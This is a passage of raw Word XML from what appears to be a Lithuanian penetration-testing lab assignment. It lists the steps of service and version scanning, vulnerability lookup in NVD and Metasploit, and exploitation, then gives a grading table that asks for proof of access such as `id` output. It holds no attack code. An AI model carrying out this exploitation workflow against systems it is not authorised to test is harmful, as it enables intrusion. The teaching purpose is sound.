        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">), jų versijos. Versijų </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> paieška </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://nvd.nist.gov</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> duomenų bazėje. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> paieška </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> duomenų bazėje. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> išnaudojimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7493E4F8" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630A27C5" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45917EFB" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darbo rezultatų vertinimas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C1402B" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="LightList-Accent1"/>
        <w:tblW w:w="4945" w:type="pct"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1364"/>
        <w:gridCol w:w="1443"/>
        <w:gridCol w:w="3275"/>
        <w:gridCol w:w="3658"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C441B" w:rsidRPr="00607DC0" w14:paraId="3ECC6452" w14:textId="77777777" w:rsidTr="00220388">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0"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00" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000090"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05C79B6C" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Studento Vertinimas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A243FE" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>(balais)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="741" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000090"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D17453C" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Galimas maksimalus vertinimo balas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1681" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000090"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10C7E019" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Vertinimo objektas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1878" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000090"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EECD5A1" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Pastabos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C441B" w:rsidRPr="00607DC0" w14:paraId="6AA58E9E" w14:textId="77777777" w:rsidTr="0022038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00" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="423167AB" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="741" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C62E8B4" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1681" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="79863C92" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Nustatyta pagrindinė informacija apie IP adresų paslaugas (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>services</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1878" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000090"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DCE9E8F" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Informacija apie paslaugas, versijos, prievadai (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>services</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>versions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C441B" w:rsidRPr="00607DC0" w14:paraId="00FC655B" w14:textId="77777777" w:rsidTr="00220388">
        <w:trPr>
          <w:trHeight w:val="265"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="700" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76BB30EB" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="741" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06509C7D" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1681" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D90174A" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Aprašytas arba pademonstruotas pažeidžiamumas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1878" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BDA4E57" w14:textId="29273A9B" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">Pažeidžiamumas, įrodymai (gali būti darbalaukio atvaizdas, gali būti rezultato iškopijavimas, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>pvz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> turite prieigą tai pademonstruota komanda $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> „</w:t>
            </w:r>
            <w:r w:rsidR="00876D9A" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>naudot</w:t>
            </w:r>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">ojo teisės </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> aplinkoje“) (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>exploiting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220388" w:rsidRPr="00607DC0" w14:paraId="29D15DD8" w14:textId="77777777" w:rsidTr="00220388">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00" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53AC2360" w14:textId="77777777" w:rsidR="00220388" w:rsidRPr="00607DC0" w:rsidRDefault="00220388" w:rsidP="003E737E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="741" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DD5EABA" w14:textId="77777777" w:rsidR="00220388" w:rsidRPr="00607DC0" w:rsidRDefault="00220388" w:rsidP="003E737E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1681" w:type="pct"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11D07218" w14:textId="77777777" w:rsidR="00220388" w:rsidRPr="00607DC0" w:rsidRDefault="00220388" w:rsidP="003E737E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
